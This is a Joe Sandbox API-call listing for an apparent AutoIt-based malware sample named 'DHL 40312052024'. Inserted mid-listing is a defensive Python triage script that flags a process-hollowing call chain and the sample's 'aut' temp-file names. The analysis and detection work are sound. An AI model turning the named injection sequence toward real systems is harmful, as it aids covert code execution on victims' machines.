                                                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                    • API String ID: 2861923089-1757145024
                                                                                    • Opcode ID: d2126beee75f92a029159714f093546408c2d7b8702877a65afe80130453fb3e
                                                                                    • Instruction ID: 2ed3b308155aca56387f46e81b39cc0b3eb04044a9f0a2223e89a9356214022b
                                                                                    • Opcode Fuzzy Hash: d2126beee75f92a029159714f093546408c2d7b8702877a65afe80130453fb3e
                                                                                    • Instruction Fuzzy Hash: 0A918E71901259EFCF04EFA5CC85AEDB7B8FF08310F10482AF915AB2A1DB78A955CB50
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007B35A1,SwapMouseButtons,00000004,?), ref: 007B35D4
                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007B35A1,SwapMouseButtons,00000004,?,?,?,?,007B2754), ref: 007B35F5
                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,007B35A1,SwapMouseButtons,00000004,?,?,?,?,007B2754), ref: 007B3617
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue
                                                                                    • String ID: Control Panel\Mouse
                                                                                    • API String ID: 3677997916-824357125
                                                                                    • Opcode ID: e6d945936beb50c1008fa3fe083b1c33348b9fe3779e64988c7fa0604337716d
                                                                                    • Instruction ID: cceca4aa6a8477670060d106561a33d402c6f7ce2dabe183293970aa5e2af4b4
                                                                                    • Opcode Fuzzy Hash: e6d945936beb50c1008fa3fe083b1c33348b9fe3779e64988c7fa0604337716d
                                                                                    • Instruction Fuzzy Hash: D0115AB5910208FFDB208F68DC80EEEB7B8EF44744F005869F905D7210E2759F8097A0
                                                                                    APIs
                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 0149C093
                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0149C129
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0149C14B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053365471.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_149a000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 2438371351-0
                                                                                    • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                                    • Instruction ID: 84a7014711e24496d02d7daefa995ba1ceda902593bbfd2899e48d5c95432acf
                                                                                    • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                                    • Instruction Fuzzy Hash: CA620C70A14218DBEB24CFA4C851BEEB772EF58700F1091A9D10DEB3A1E7759E81CB59
                                                                                    APIs
                                                                                      • Part of subcall function 007B4EE5: _fseek.LIBCMT ref: 007B4EFD
                                                                                      • Part of subcall function 00819734: _wcscmp.LIBCMT ref: 00819824
                                                                                      • Part of subcall function 00819734: _wcscmp.LIBCMT ref: 00819837
                                                                                    • _free.LIBCMT ref: 008196A2
                                                                                    • _free.LIBCMT ref: 008196A9
                                                                                    • _free.LIBCMT ref: 00819714
                                                                                      • Part of subcall function 007D2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,007D9A24), ref: 007D2D69
                                                                                      • Part of subcall function 007D2D55: GetLastError.KERNEL32(00000000,?,007D9A24), ref: 007D2D7B
                                                                                    • _free.LIBCMT ref: 0081971C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                    • String ID:
                                                                                    • API String ID: 1552873950-0
                                                                                    • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                    • Instruction ID: 17aaf03a57c37252e8586a43f8182bb6ed9bdfacb4cf7009aaa3a490368adbc2
                                                                                    • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                    • Instruction Fuzzy Hash: FF513BB1904218AFDB249F64CC85AEEBBBAFF48300F10449EF249A3341DB755A818F59
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 2782032738-0
                                                                                    • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                    • Instruction ID: ed2c802da1192d44e6524126860b37e7d472d83b40a6481e30056a051fb6276c
                                                                                    • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                    • Instruction Fuzzy Hash: F441B375A00746ABDF188E69C8849AE7BB6EF453A0B24813FE81987740EB78DD409B50
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 007B44CF
                                                                                      • Part of subcall function 007B407C: _memset.LIBCMT ref: 007B40FC
                                                                                      • Part of subcall function 007B407C: _wcscpy.LIBCMT ref: 007B4150
                                                                                      • Part of subcall function 007B407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007B4160
                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 007B4524
                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007B4533
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007ED4B9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                    • String ID:
                                                                                    • API String ID: 1378193009-0
                                                                                    • Opcode ID: e92da53a10fc4e5ad68033ac574dbe28e8ee55f9b1e3a35dcf9c575e55cbd184
                                                                                    • Instruction ID: 88998f7880d2fbbe6baa2de94640cd70cf8fb1b4877a8520131d3eeea2663a02
                                                                                    • Opcode Fuzzy Hash: e92da53a10fc4e5ad68033ac574dbe28e8ee55f9b1e3a35dcf9c575e55cbd184
                                                                                    • Instruction Fuzzy Hash: 9621D7709057C4AFE7329B248859BE6BBECAF16314F04049DE79E56183C3786D84CB51
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 007EEA39
                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 007EEA83
                                                                                      • Part of subcall function 007B4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007B4743,?,?,007B37AE,?), ref: 007B4770
                                                                                      • Part of subcall function 007D0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007D07B0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                                    • String ID: X
                                                                                    • API String ID: 3777226403-3081909835
                                                                                    • Opcode ID: 9ec0850537f27cdd664cf64a5321ec00e0f859473be61c2b3844fb87487da93c
                                                                                    • Instruction ID: c810e1f926fa8989a4300c905cbb2d1d5d83db1e529c3183a87dfe0c71ba9633
                                                                                    • Opcode Fuzzy Hash: 9ec0850537f27cdd664cf64a5321ec00e0f859473be61c2b3844fb87487da93c
                                                                                    • Instruction Fuzzy Hash: 37219371A10288DBCF459FD4D849BEE7BF9AF49714F00405AE508EB342DBB85989CFA1
                                                                                    APIs
                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 008198F8
                                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0081990F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Temp$FileNamePath
                                                                                    • String ID: aut
                                                                                    • API String ID: 3285503233-3010740371
                                                                                    • Opcode ID: 774e9bd1813f2b48143140741f115e222897bfa72bc6058ac0fa9bec7cdceffa
                                                                                    • Instruction ID: 0dcf4b0c3a840ba387067e854d36cc80d225ab7f43ed91cf8416ad459f3893a6
                                                                                    • Opcode Fuzzy Hash: 774e9bd1813f2b48143140741f115e222897bfa72bc6058ac0fa9bec7cdceffa
                                                                                    • Instruction Fuzzy Hash: 96D05E7994030DEBDB609BA0DC0EF9BB73CF744700F0006B1BB58D21A2EAB095988BD1
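Two entries above carry the security-relevant signal of this listing: the function at 0149C093 calls CreateProcessW, then Wow64GetThreadContext with 00010007 (CONTEXT_FULL for a 32-bit thread) and a 4-byte ReadProcessMemory, which is the opening of the process-hollowing chain, and it runs from a region the report marks "based on PE: false", i.e. unpacked code rather than the AutoIt runtime image; the function at 0081990F passes the prefix "aut" to GetTempFileNameW, so dropped files follow the aut<hex>.tmp pattern. The script below is an added triage helper written for this page, not part of Joe Sandbox or of the sample; it parses call lines in the report's own format and raises both findings. The step names, the "spawn plus two further steps" threshold and the temp-name regex are this example's own assumptions, and the sample text is copied from the two report entries.

```python
"""Added triage helper for Joe Sandbox per-function "APIs" listings (not Joe Sandbox code)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Matches one call line, with or without the "Part of subcall" prefix:
#   • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0149C129
#     • Part of subcall function 007B4EE5: _fseek.LIBCMT ref: 007B4EFD
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Matches the "Memory Dump Source" line that says whether the code is image-backed.
SOURCE_LINE = re.compile(r"Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")

# Hollowing chain in the order a loader performs it (assumed step names); the
# report's entry at 0149C093 shows the first three.
HOLLOWING_STEPS = [
    ("spawn",    {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"}),
    ("read_ctx", {"GetThreadContext", "Wow64GetThreadContext"}),
    ("read_mem", {"ReadProcessMemory", "NtReadVirtualMemory"}),
    ("unmap",    {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"}),
    ("alloc",    {"VirtualAllocEx", "NtAllocateVirtualMemory"}),
    ("write",    {"WriteProcessMemory", "NtWriteVirtualMemory"}),
    ("set_ctx",  {"SetThreadContext", "Wow64SetThreadContext"}),
    ("resume",   {"ResumeThread", "NtResumeThread"}),
]

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall: bool

@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)
    offset: Optional[str] = None
    backed_by_pe: Optional[bool] = None

def parse_entry(text: str) -> FunctionEntry:
    """Parse one function's report text (APIs list plus Memory Dump Source line)."""
    entry = FunctionEntry()
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            raw = m.group("args") or ""
            args = [a.strip() for a in raw.split(",")] if raw else []
            entry.calls.append(ApiCall(m.group("name"), m.group("module"), args,
                                       m.group("ref").upper(), m.group("sub") is not None))
            continue
        m = SOURCE_LINE.search(line)
        if m:
            entry.offset = m.group("offset").upper()
            entry.backed_by_pe = m.group("pe") == "true"
    return entry

def hollowing_steps(entry: FunctionEntry) -> List[str]:
    """Hollowing steps present in the entry, in order of first appearance."""
    seen: List[str] = []
    for call in entry.calls:
        for step, names in HOLLOWING_STEPS:
            if call.name in names and step not in seen:
                seen.append(step)
    return seen

def autoit_temp_prefix(entry: FunctionEntry) -> Optional[str]:
    """Prefix argument of GetTempFileNameW/A, if the function calls it."""
    for call in entry.calls:
        if call.name in ("GetTempFileNameW", "GetTempFileNameA") and len(call.args) >= 2:
            return call.args[1]
    return None

def is_autoit_temp_name(filename: str, prefix: str = "aut") -> bool:
    """True for names GetTempFileName(prefix, uUnique=0) produces, e.g. aut1A2B.tmp."""
    return re.fullmatch(rf"{re.escape(prefix)}[0-9A-Fa-f]{{1,4}}\.tmp", filename, re.IGNORECASE) is not None

def triage(text: str) -> dict:
    """Findings for one report entry; thresholds are this example's assumptions."""
    entry = parse_entry(text)
    steps = hollowing_steps(entry)
    return {
        "hollowing_steps": steps,
        # Spawn first, then at least two further chain steps: the shape seen at 0149C093.
        "hollowing_suspect": bool(steps) and steps[0] == "spawn" and len(steps) >= 3,
        # Code the report cannot map to a loaded PE is unpacked or injected code.
        "code_outside_image": entry.backed_by_pe is False,
        "autoit_temp_prefix": autoit_temp_prefix(entry),
    }

# Constructed sample input, copied from two entries of this report.
SAMPLE_HOLLOWING = """\
• CreateProcessW.KERNELBASE(?,00000000), ref: 0149C093
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0149C129
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0149C14B
• Source File: 00000000.00000002.2053365471.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
"""
SAMPLE_TEMP = """\
• GetTempPathW.KERNEL32(00000104,?), ref: 008198F8
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0081990F
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
"""

if __name__ == "__main__":
    for sample in (SAMPLE_HOLLOWING, SAMPLE_TEMP):
        print(triage(sample))
```

The hollowing check deliberately requires CreateProcess to come first: GetThreadContext and ReadProcessMemory on their own are common in debuggers and crash handlers, and it is the spawn-then-inspect ordering from a non-image-backed region that marks a loader. The temp-name pattern is what to hunt for in file-creation telemetry on hosts that ran this sample.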
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4ce9777ab0baf048678a5b6e8d6fba2f11123310c94275f87b23276cfe6b3ead
                                                                                    • Instruction ID: 51107fba45b8326dae5f774ec95ae67e2a9d4fd286b1bcb955539e3eca2e6a73
                                                                                    • Opcode Fuzzy Hash: 4ce9777ab0baf048678a5b6e8d6fba2f11123310c94275f87b23276cfe6b3ead
                                                                                    • Instruction Fuzzy Hash: 4AF146706083109FCB14DF28D484A6EBBE5FF89314F14892EF9999B251DB74E985CF82
                                                                                    APIs
                                                                                      • Part of subcall function 007D0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007D0193
                                                                                      • Part of subcall function 007D0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 007D019B
                                                                                      • Part of subcall function 007D0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007D01A6
                                                                                      • Part of subcall function 007D0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007D01B1
                                                                                      • Part of subcall function 007D0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 007D01B9
                                                                                      • Part of subcall function 007D0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 007D01C1
                                                                                      • Part of subcall function 007C60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,007BF930), ref: 007C6154
                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 007BF9CD
                                                                                    • OleInitialize.OLE32(00000000), ref: 007BFA4A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 007F45C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1986988660-0
                                                                                    • Opcode ID: c59005978968caab23e06ee9c44ac227d77174801ef41f326dc402604f35886d
                                                                                    • Instruction ID: 47f3078e3931a5972a86af1376263dfc680ba583264c78eac00f6f9ea190e857
                                                                                    • Opcode Fuzzy Hash: c59005978968caab23e06ee9c44ac227d77174801ef41f326dc402604f35886d
                                                                                    • Instruction Fuzzy Hash: 5A81CAF0901A40CED398DF69A84D6587BE5FB99306B50852AD11CCB37AE7F4C4C88F58
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 007B4370
                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 007B4415
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007B4432
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconNotifyShell_$_memset
                                                                                    • String ID:
                                                                                    • API String ID: 1505330794-0
                                                                                    APIs
                                                                                    • __FF_MSGBANNER.LIBCMT ref: 007D5733
                                                                                      • Part of subcall function 007DA16B: __NMSG_WRITE.LIBCMT ref: 007DA192
                                                                                      • Part of subcall function 007DA16B: __NMSG_WRITE.LIBCMT ref: 007DA19C
                                                                                    • __NMSG_WRITE.LIBCMT ref: 007D573A
                                                                                      • Part of subcall function 007DA1C8: GetModuleFileNameW.KERNEL32(00000000,008733BA,00000104,?,00000001,00000000), ref: 007DA25A
                                                                                      • Part of subcall function 007DA1C8: ___crtMessageBoxW.LIBCMT ref: 007DA308
                                                                                      • Part of subcall function 007D309F: ___crtCorExitProcess.LIBCMT ref: 007D30A5
                                                                                      • Part of subcall function 007D309F: ExitProcess.KERNEL32 ref: 007D30AE
                                                                                      • Part of subcall function 007D8B28: __getptd_noexit.LIBCMT ref: 007D8B28
                                                                                    • RtlAllocateHeap.NTDLL(01210000,00000000,00000001,00000000,?,?,?,007D0DD3,?), ref: 007D575F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                    • String ID:
                                                                                    • API String ID: 1372826849-0
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00819548,?,?,?,?,?,00000004), ref: 008198BB
                                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00819548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 008198D1
                                                                                    • CloseHandle.KERNEL32(00000000,?,00819548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008198D8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                    • String ID:
                                                                                    • API String ID: 3397143404-0
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00818D1B
                                                                                      • Part of subcall function 007D2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,007D9A24), ref: 007D2D69
                                                                                      • Part of subcall function 007D2D55: GetLastError.KERNEL32(00000000,?,007D9A24), ref: 007D2D7B
                                                                                    • _free.LIBCMT ref: 00818D2C
                                                                                    • _free.LIBCMT ref: 00818D3E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CALL
                                                                                    • API String ID: 0-4196123274
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID: EA06
                                                                                    • API String ID: 4104443479-3962188686
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID:
                                                                                    • API String ID: 4104443479-0
                                                                                    APIs
                                                                                    • IsThemeActive.UXTHEME ref: 007B4834
                                                                                      • Part of subcall function 007D336C: __lock.LIBCMT ref: 007D3372
                                                                                      • Part of subcall function 007D336C: DecodePointer.KERNEL32(00000001,?,007B4849,00807C74), ref: 007D337E
                                                                                      • Part of subcall function 007D336C: EncodePointer.KERNEL32(?,?,007B4849,00807C74), ref: 007D3389
                                                                                      • Part of subcall function 007B48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 007B4915
                                                                                      • Part of subcall function 007B48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007B492A
                                                                                      • Part of subcall function 007B3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007B3B68
                                                                                      • Part of subcall function 007B3B3A: IsDebuggerPresent.KERNEL32 ref: 007B3B7A
                                                                                      • Part of subcall function 007B3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,008752F8,008752E0,?,?), ref: 007B3BEB
                                                                                      • Part of subcall function 007B3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 007B3C6F
                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007B4874
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
